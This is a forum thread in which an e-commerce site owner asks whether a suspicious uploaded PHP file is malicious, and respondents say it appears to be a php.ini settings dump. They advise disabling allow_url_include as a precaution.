Malicious PHP Code?

[NJT123]

 

Hi, I'm hoping someone with knowledge of PHP can swiftly put my mind at rest. Until yesterday I had not even heard of PHP, so appologis if this is completely obvious.

 

A couple of days ago my server started giving me warning summaries of recently uploaded CGI scripts that send mail from my server, alluding to the fact it may be spam. Only I have access to my server, and the FTP logs against the culprit file all give my local IP address.

 

I have read through the file, and some basic PHP, and I think it is just some sort of error log compiler that then emails the error log to someone (who I do not know).

 

I have attached the file in question below. I think its harmless, but would very much like to hear the same conclusion from a PHP expert.

 

Any input greatly appreciated!

 

NJT

 

[attachment deleted by admin]

[Mchl]

By itself it does nothing. It contains however some php settings, that if implemented on your server may increase it's vulnerabilty to attack from outside. Check if there are no more suspicious files or bits of code on your site.

 

There are several kinds of malware that use passwords stored in FTP clients to upload malicious code to your server. That's why you should NOT store passwords in these clients.

[salathe]

That attached file is essentially a different representation of the contents of a php.ini configuration file. The file does not 'compile' any error logs nor does it email anyone... did you perhaps attach the wrong file?

[NJT123]

Many thanks for the replies.

 

I've checked the file, and it is correct. Just to be double sure I've attached the original from the server here (I save the same file out as txt in the previous post).

 

[attachment deleted by admin]

[NJT123]

I'm now wondering if this might be overzealous spam checking on the part of my server, and it simply picked up the word 'mail' from inside the PHP file.

 

Just a little strange I've never received it (the error) before.

[Mchl]

Do you use PHP anywhere else on your site?

[NJT123]

To be honest, I do not know. Its an e-commerce site powered by x-cart so I would the imaging the answer to be yes.

[Mchl]

So this might be as well a hole in x-cart being exploited. Especially, if in your php ini you have 'allow_url_fopen' and 'allow_url_include' settings enabled (as the file you attached suggests).

[NJT123]

Thanks again. I've posted this question to x-cart directly, including a link to this thread and the file.

 

Will update everyone on the answer. In the meantime, any other conclusions welcome.

[Mchl]

If you have access to your php.ini file, check what values have the settings given above. You can also use phpinfo function for that. If you can, disable 'allow_url_include' setting.

[NJT123]

Thanks for the advice, I have access to the file. However I have no clue about how all this ties into the rest of the store, I'm loathe to make changes to something I do not understand.

[Mchl]

Manual here:

http://www.x-cart.com/xcart_manual/compiled/X-Cart_430_manual.pdf

 

says you need

allow_url_fopen = on

 

but you can probably safely disable allow_url_include

allow_url_include = Off

[NJT123]

Above and beyond Mchl. Thank You!

 

Will have a dabble with more confidence now.

 

If you do any work on a consultancy basis / hourly rate and are happy working with x-cart and e-commerce payment systems PM me, I have plenty available. People with the right skills have proven few and far between.

[Mchl]

Unfortunately apart from having very little time on my hands, I've also no experience with x-cart, and it would be worse than irresponsible from me, to embark on finding and fixing possible security flaws in it.

 

Disabling allow_url_include might  fix your issue, but just as well it might not. It's just one possible vector of attack less.